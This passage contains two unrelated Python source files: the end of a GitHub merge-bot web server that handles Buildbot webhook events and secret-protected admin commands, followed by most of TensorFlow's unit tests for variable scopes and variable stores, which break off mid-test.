continue
repo_cfg = g.repo_cfgs[repo_label]
if request.forms.secret != repo_cfg['buildbot']['secret']:
abort(400, 'Invalid secret')
build_succ = 'successful' in info['text'] or info['results'] == 0
url = '{}/builders/{}/builds/{}'.format(
repo_cfg['buildbot']['url'],
info['builderName'],
props['buildnumber'],
)
if 'interrupted' in info['text']:
step_name = ''
for step in reversed(info['steps']):
if 'interrupted' in step.get('text', []):
step_name = step['name']
break
if step_name:
try:
url = ('{}/builders/{}/builds/{}/steps/{}/logs/interrupt' # noqa
).format(repo_cfg['buildbot']['url'],
info['builderName'],
props['buildnumber'],
step_name,)
res = requests.get(url)
except Exception as ex: # noqa
logger.warn('/buildbot encountered an error during '
'github logs request')
lazy_debug(
logger,
lambda ex=ex: 'buildbot logs err: {}'.format(ex),
)
abort(502, 'Bad Gateway')
mat = INTERRUPTED_BY_HOMU_RE.search(res.text)
if mat:
interrupt_token = mat.group(1)
if getattr(state, 'interrupt_token',
'') != interrupt_token:
state.interrupt_token = interrupt_token
if state.status == 'pending':
state.set_status('')
desc = (':snowman: The build was interrupted '
'to prioritize another pull request.')
state.add_comment(desc)
state.change_labels(LabelEvent.INTERRUPTED)
utils.github_create_status(state.get_repo(),
state.head_sha,
'error', url,
desc,
context='homu')
g.queue_handler()
continue
else:
logger.error('Corrupt payload from Buildbot')
report_build_res(build_succ, url, info['builderName'],
state, logger, repo_cfg)
elif row['event'] == 'buildStarted':
info = row['payload']['build']
lazy_debug(logger, lambda: 'info: {}'.format(info))
props = dict(x[:2] for x in info['properties'])
if not props['revision']:
continue
try:
state, repo_label = find_state(props['revision'])
except ValueError:
pass
else:
if info['builderName'] in state.build_res:
repo_cfg = g.repo_cfgs[repo_label]
if request.forms.secret != repo_cfg['buildbot']['secret']:
abort(400, 'Invalid secret')
url = '{}/builders/{}/builds/{}'.format(
repo_cfg['buildbot']['url'],
info['builderName'],
props['buildnumber'],
)
state.set_build_res(info['builderName'], None, url)
if g.buildbot_slots[0] == props['revision']:
g.buildbot_slots[0] = ''
g.queue_handler()
return 'OK'
def synch(user_gh, state, repo_label, repo_cfg, repo):
if not repo.is_collaborator(user_gh.user().login):
abort(400, 'You are not a collaborator')
Thread(target=synchronize, args=[repo_label, g.cfg, repo_cfg, g.logger,
g.gh, g.states, g.repos, g.db,
g.mergeable_que, g.my_username,
g.repo_labels]).start()
return 'Synchronizing {}...'.format(repo_label)
def synch_all():
@retry(wait_exponential_multiplier=1000, wait_exponential_max=600000)
def sync_repo(repo_label, g):
try:
synchronize(repo_label, g.cfg, g.repo_cfgs[repo_label], g.logger,
g.gh, g.states, g.repos, g.db, g.mergeable_que,
g.my_username, g.repo_labels)
except Exception:
print('* Error while synchronizing {}'.format(repo_label))
traceback.print_exc()
raise
for repo_label in g.repos:
sync_repo(repo_label, g)
print('* Done synchronizing all')
@post('/admin')
def admin():
if request.json['secret'] != g.cfg['web']['secret']:
return 'Authentication failure'
if request.json['cmd'] == 'repo_new':
repo_label = request.json['repo_label']
repo_cfg = request.json['repo_cfg']
g.states[repo_label] = {}
g.repos[repo_label] = None
g.repo_cfgs[repo_label] = repo_cfg
g.repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
Thread(target=synchronize, args=[repo_label, g.cfg, repo_cfg, g.logger,
g.gh, g.states, g.repos, g.db,
g.mergeable_que, g.my_username,
g.repo_labels]).start()
return 'OK'
elif request.json['cmd'] == 'repo_del':
repo_label = request.json['repo_label']
repo_cfg = g.repo_cfgs[repo_label]
db_query(g.db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
db_query(g.db, 'DELETE FROM build_res WHERE repo = ?', [repo_label])
db_query(g.db, 'DELETE FROM mergeable WHERE repo = ?', [repo_label])
del g.states[repo_label]
del g.repos[repo_label]
del g.repo_cfgs[repo_label]
del g.repo_labels[repo_cfg['owner'], repo_cfg['name']]
return 'OK'
elif request.json['cmd'] == 'repo_edit':
repo_label = request.json['repo_label']
repo_cfg = request.json['repo_cfg']
assert repo_cfg['owner'] == g.repo_cfgs[repo_label]['owner']
assert repo_cfg['name'] == g.repo_cfgs[repo_label]['name']
g.repo_cfgs[repo_label] = repo_cfg
return 'OK'
elif request.json['cmd'] == 'sync_all':
Thread(target=synch_all).start()
return 'OK'
return 'Unrecognized command'
def start(cfg, states, queue_handler, repo_cfgs, repos, logger,
buildbot_slots, my_username, db, repo_labels, mergeable_que, gh):
env = jinja2.Environment(
loader=jinja2.FileSystemLoader(pkg_resources.resource_filename(__name__, 'html')), # noqa
autoescape=True,
)
tpls = {}
tpls['index'] = env.get_template('index.html')
tpls['queue'] = env.get_template('queue.html')
tpls['build_res'] = env.get_template('build_res.html')
g.cfg = cfg
g.states = states
g.queue_handler = queue_handler
g.repo_cfgs = repo_cfgs
g.repos = repos
g.logger = logger.getChild('server')
g.buildbot_slots = buildbot_slots
g.tpls = tpls
g.my_username = my_username
g.db = db
g.repo_labels = repo_labels
g.mergeable_que = mergeable_que
g.gh = gh
# Synchronize all PR data on startup
if cfg['web'].get('sync_on_start', False):
Thread(target=synch_all).start()
try:
run(host=cfg['web'].get('host', '0.0.0.0'),
port=cfg['web']['port'],
server='waitress')
except OSError as e:
print(e, file=sys.stderr)
os._exit(1)
|
variable_scope_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import numpy
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class VariableScopeTest(test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
@test_util.run_in_graph_and_eager_modes()
def testResource(self):
vs = variable_scope._get_default_variable_store()
v1 = vs.get_variable("v", [1], use_resource=True)
self.assertTrue(isinstance(v1, resource_variable_ops.ResourceVariable))
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
# When reuse is False, we fail when variables are already there.
vs.get_variable("w", [1], reuse=False) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("v", [1], reuse=False) # That fails.
# When reuse is True, we fail when variables are new.
vs.get_variable("v", [1], reuse=True) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("u", [1], reuse=True) # That fails.
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set([v.name for v in vs._vars.values()]))
@test_util.run_in_graph_and_eager_modes()
def testVarScopeInitializer(self):
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("tower0") as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with variable_scope.variable_scope(tower, initializer=init):
w = variable_scope.get_variable("w", [])
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes()
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with variable_scope.variable_scope("tower1") as tower:
with variable_scope.variable_scope("foo", constraint=constraint):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.constraint, constraint)
with variable_scope.variable_scope(tower, constraint=constraint):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.constraint, constraint)
def testStringDefaultInitializer(self):
with self.test_session():
v = variable_scope.get_variable("string", shape=[], dtype=dtypes.string)
variables_lib.global_variables_initializer().run()
self.assertAllEqual(compat.as_bytes(v.eval()), b"")
@test_util.run_in_graph_and_eager_modes()
def testVarScopeDType(self):
with variable_scope.variable_scope("tower2") as tower:
with variable_scope.variable_scope("foo", dtype=dtypes.float16):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, dtypes.float16)
with variable_scope.variable_scope(tower, dtype=dtypes.float16):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, dtypes.float16)
def testGetVariableInGraphNestedUnderEagerContext(self):
with context.eager_mode():
@function.defun
def f():
v = variable_scope.get_variable("should_be_resource", [])
self.assertEqual(type(v), resource_variable_ops.ResourceVariable)
f()
def testEagerVariableStore(self):
with context.eager_mode():
store = variable_scope.EagerVariableStore()
with store.as_default():
v = variable_scope.get_variable("v", shape=(), trainable=True)
w = variable_scope.get_variable("w", shape=(), trainable=False)
self.assertTrue(v in store.variables())
self.assertTrue(w in store.variables())
self.assertTrue(v in store.trainable_variables())
self.assertFalse(w in store.trainable_variables())
self.assertFalse(v in store.non_trainable_variables())
self.assertTrue(w in store.non_trainable_variables())
# Test copying.
new_store = store.copy()
with new_store.as_default():
new_v = variable_scope.get_variable("v")
new_w = variable_scope.get_variable("w")
self.assertEqual(new_v.numpy(), v.numpy())
self.assertEqual(new_w.numpy(), w.numpy())
self.assertTrue(new_v in new_store.variables())
self.assertTrue(new_w in new_store.variables())
self.assertTrue(new_v in new_store.trainable_variables())
self.assertFalse(new_w in new_store.trainable_variables())
self.assertFalse(new_v in new_store.non_trainable_variables())
self.assertTrue(new_w in new_store.non_trainable_variables())
# Check that variables are separate instances.
for v in store.variables():
v.assign(-1)
for v in new_store.variables():
v.assign(1)
for v in store.variables():
self.assertEqual(v.numpy(), -1)
for v in new_store.variables():
self.assertEqual(v.numpy(), 1)
def testEagerVariableStoreWithEagerDefun(self):
with context.eager_mode():
@function.defun
def f():
x = constant_op.constant([[2.0]])
d1 = core_layers.Dense(
1, name="my_dense", kernel_initializer=init_ops.ones_initializer())
_ = d1(x) # create variables
self.assertEqual(len(d1.variables), 2)
v1, v2 = d1.variables
d2 = core_layers.Dense(
1,
name="my_dense",
kernel_initializer=init_ops.ones_initializer(),
_reuse=True)
_ = d2(x)
self.assertEqual(len(d2.variables), 2)
v3, v4 = d2.variables
self.assertAllEqual([v1, v2], [v3, v4])
f()
@test_util.run_in_graph_and_eager_modes()
def testInitFromNonTensorValue(self):
v = variable_scope.get_variable("v4", initializer=4, dtype=dtypes.int32)
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = variable_scope.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=dtypes.int64)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if context.executing_eagerly() else TypeError
with self.assertRaises(error):
variable_scope.get_variable("x4", initializer={})
@test_util.run_in_graph_and_eager_modes()
def testInitFromNonInitializer(self):
# Test various dtypes with zeros initializer as following:
types = [
dtypes.int8, dtypes.uint8, dtypes.int16, dtypes.uint16, dtypes.int32,
dtypes.int64, dtypes.bool
]
# Use different variable_name to distinguish various dtypes
for (i, dtype) in enumerate(types):
x = variable_scope.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = variable_scope.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=init_ops.zeros_initializer(dtype=dtype))
self.evaluate(variables_lib.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
# TODO(alive): support variable partitioning/caching in eager mode.
def testVarScopeCachingDevice(self):
with self.test_session():
caching_device = "/job:moo"
with variable_scope.variable_scope("tower"):
with variable_scope.variable_scope(
"caching", caching_device=caching_device):
v = variable_scope.get_variable("v", [])
self.assertTrue(v.value().device.startswith(caching_device))
with variable_scope.variable_scope("child"):
v2 = variable_scope.get_variable("v", [])
self.assertTrue(v2.value().device.startswith(caching_device))
with variable_scope.variable_scope("not_cached", caching_device=""):
v2_not_cached = variable_scope.get_variable("v", [])
self.assertFalse(
v2_not_cached.value().device.startswith(caching_device))
with variable_scope.variable_scope(
"not_cached_identity_device",
caching_device=lambda op: op.device):
v2_identity_device = variable_scope.get_variable("v", [])
self.assertFalse(
v2_identity_device.value().device.startswith(caching_device))
with variable_scope.variable_scope("we_will_do_it_live") as vs_live:
vs_live.set_caching_device("/job:live")
v_live = variable_scope.get_variable("v", [])
self.assertTrue(v_live.value().device.startswith("/job:live"))
v_tower = variable_scope.get_variable("v", [])
self.assertFalse(v_tower.value().device.startswith(caching_device))
@test_util.run_in_graph_and_eager_modes()
def testVarScopeRegularizer(self):
init = init_ops.constant_initializer(0.3)
def regularizer1(v):
return math_ops.reduce_mean(v) + 0.1
def regularizer2(v):
return math_ops.reduce_mean(v) + 0.2
with variable_scope.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(1, len(losses))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
with variable_scope.variable_scope(tower, initializer=init) as vs:
u = variable_scope.get_variable("u", [])
vs.set_regularizer(regularizer2)
w = variable_scope.get_variable("w", [])
# Next 3 variable not regularized to test disabling regularization.
x = variable_scope.get_variable(
"x", [], regularizer=variable_scope.no_regularizer)
with variable_scope.variable_scope(
"baz", regularizer=variable_scope.no_regularizer):
y = variable_scope.get_variable("y", [])
vs.set_regularizer(variable_scope.no_regularizer)
z = variable_scope.get_variable("z", [])
# Check results.
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses))
self.evaluate(variables_lib.variables_initializer([u, w, x, y, z]))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
self.assertAllClose(self.evaluate(losses[1]), 0.4)
self.assertAllClose(self.evaluate(losses[2]), 0.5)
with variable_scope.variable_scope("foo", reuse=True):
# reuse=True is for now only supported when eager execution is disabled.
if not context.executing_eagerly():
v = variable_scope.get_variable("v",
[]) # "v" is alredy there, reused
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses)) # No new loss added.
@test_util.run_in_graph_and_eager_modes()
def testInitializeFromValue(self):
init = constant_op.constant(0.1)
w = variable_scope.get_variable("v", initializer=init)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegexp(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
variable_scope.get_variable("u", [1], initializer=init)
with variable_scope.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = variable_scope.get_variable("v")
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = constant_op.constant(1, dtype=dtypes.int32)
t = variable_scope.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, dtypes.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegexp(ValueError, "don't match"):
variable_scope.get_variable("s", initializer=init, dtype=dtypes.float64)
def testControlDeps(self):
with self.test_session() as sess:
v0 = variable_scope.get_variable(
"v0", [1], initializer=init_ops.constant_initializer(0))
with ops.control_dependencies([v0.value()]):
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
add = v1 + v0
# v0 should be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
# We should be able to initialize and run v1 without initializing
# v0, even if the variable was created with a control dep on v0.
sess.run(v1.initializer)
self.assertEqual(1, sess.run(v1))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(add)
# If we initialize v0 we should be able to run 'add'.
sess.run(v0.initializer)
sess.run(add)
def testControlFlow(self):
with self.test_session() as sess:
v0 = variable_scope.get_variable(
"v0", [], initializer=init_ops.constant_initializer(0))
var_dict = {}
# Call get_variable in each of the cond clauses.
def var_in_then_clause():
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
var_dict["v1"] = v1
return v1 + v0
def var_in_else_clause():
v2 = variable_scope.get_variable(
"v2", [1], initializer=init_ops.constant_initializer(2))
var_dict["v2"] = v2
return v2 + v0
add = control_flow_ops.cond(
math_ops.less(v0, 10), var_in_then_clause, var_in_else_clause)
v1 = var_dict["v1"]
v2 = var_dict["v2"]
# We should be able to initialize and run v1 and v2 without initializing
# v0, even if the variable was created with a control dep on v0.
sess.run(v1.initializer)
self.assertEqual([1], sess.run(v1))
sess.run(v2.initializer)
self.assertEqual([2], sess.run(v2))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
# We should not be able to run 'add' yet.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(add)
# If we initialize v0 we should be able to run 'add'.
sess.run(v0.initializer)
sess.run(add)
@test_util.run_in_graph_and_eager_modes()
def testGetVariableScope(self):
# Test the get_variable_scope() function and setting properties of result.
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("bar"):
new_init1 = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init1, None)
# Check that we can set initializer like this.
variable_scope.get_variable_scope().set_initializer(init)
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
if not context.executing_eagerly():
# Check that we can set reuse.
variable_scope.get_variable_scope().reuse_variables()
with self.assertRaises(ValueError): # Fail, w does not exist yet.
variable_scope.get_variable("w", [1])
# Check that the set initializer goes away.
new_init = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init, None)
@test_util.run_in_graph_and_eager_modes()
def testVarScope(self):
with variable_scope.variable_scope("tower4") as tower:
self.assertEqual(tower.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower4/scope/")
with variable_scope.variable_scope("tower5"):
with variable_scope.variable_scope("bar") as bar:
self.assertEqual(bar.name, "tower5/bar")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower5/bar/scope/")
with variable_scope.variable_scope("tower6"):
with variable_scope.variable_scope(tower, reuse=True) as tower_shared:
self.assertEqual(tower_shared.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower6/tower4/scope/")
@test_util.run_in_graph_and_eager_modes()
def testVarScopeNameScope(self):
with ops.name_scope("testVarScopeNameScope1"):
with variable_scope.variable_scope("tower") as tower:
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(
tower): # Re-entering acts like another "tower".
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_1/scope2/")
with variable_scope.variable_scope(
"tower"): # Re-entering by string acts the same.
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_2/scope2/")
with ops.name_scope("testVarScopeNameScope2"):
with variable_scope.variable_scope("tower"):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(tower):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower_1/scope2/")
root_var_scope = variable_scope.get_variable_scope()
with ops.name_scope("testVarScopeNameScope3"):
with variable_scope.variable_scope(root_var_scope):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope3/scope2/")
def testVarScopeOriginalNameScope(self):
with self.test_session():
with ops.name_scope("scope1"):
with variable_scope.variable_scope("tower") as tower:
self.assertEqual(tower.original_name_scope, "scope1/tower/")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "scope1/tower/scope2/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower) as tower1:
# Re-entering preserves original name scope.
self.assertEqual(tower1.original_name_scope, "scope1/tower/")
with ops.name_scope("foo") as sc2:
self.assertEqual(sc2, "scope2/tower/foo/")
# Test re-entering original name scope.
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower):
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar_1/")
def testVarScopeObjectReuse(self):
with self.test_session():
vs = None
with variable_scope.variable_scope("jump", reuse=True) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertTrue(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertTrue(jump_no_reuse.reuse) # Inherited, cannot be undone.
with variable_scope.variable_scope("jump", reuse=False) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertFalse(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertFalse(jump_no_reuse.reuse)
def testVarScopeGetOrCreateReuse(self):
with self.test_session():
def test_value(value):
x = constant_op.constant(value)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = state_ops.assign(variable_scope.get_variable("var", []), x)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = variable_scope.get_variable("var", [])
self.assertEqual(value, x.eval())
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
def testVarOpScope(self):
with self.test_session():
with ops.name_scope("testVarOpScope1"):
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "tower/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower/testVarOpScope2/")
with variable_scope.variable_scope("tower", "default", []):
with self.assertRaises(ValueError):
variable_scope.get_variable("w", [])
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower_1/testVarOpScope2/")
with ops.name_scope("testVarOpScope2"):
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default/testVarOpScope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default_1/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default_1/testVarOpScope2/")
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.test_session():
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
def testVarOpScopeUniqueNamesWithJump(self):
with self.test_session():
with variable_scope.variable_scope("default") as default:
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/layer/w:0")
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/layer_1/w:0")
with variable_scope.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/layer_2/w:0")
def testVarOpScopeReuse(self):
with self.test_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True) as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
def testVarScopeGetVar(self):
with self.test_session():
with variable_scope.variable_scope("root"):
with variable_scope.variable_scope("towerA") as tower_a:
va = variable_scope.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("towerB"):
vb = variable_scope.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with self.assertRaises(ValueError):
with variable_scope.variable_scope("towerA"):
va2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("towerA", reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("foo"):
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va3 = variable_scope.get_variable("v", [1])
self.assertEqual(va, va3)
with self.assertRaises(ValueError):
with variable_scope.variable_scope(tower_a, reuse=True):
with variable_scope.variable_scope("baz"):
variable_scope.get_variable("v", [1])
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [1], dtype=dtypes.int32)
self.assertEqual("dtype" in str(exc.exception), True)
def testVarScopeOuterScope(self):
with self.test_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer):
self.assertEqual(variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
def testVarScopeNestedOuterScope(self):
with self.test_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer_1/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default_1/scope2/")
def testVarOpScopeReuseParam(self):
with self.test_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
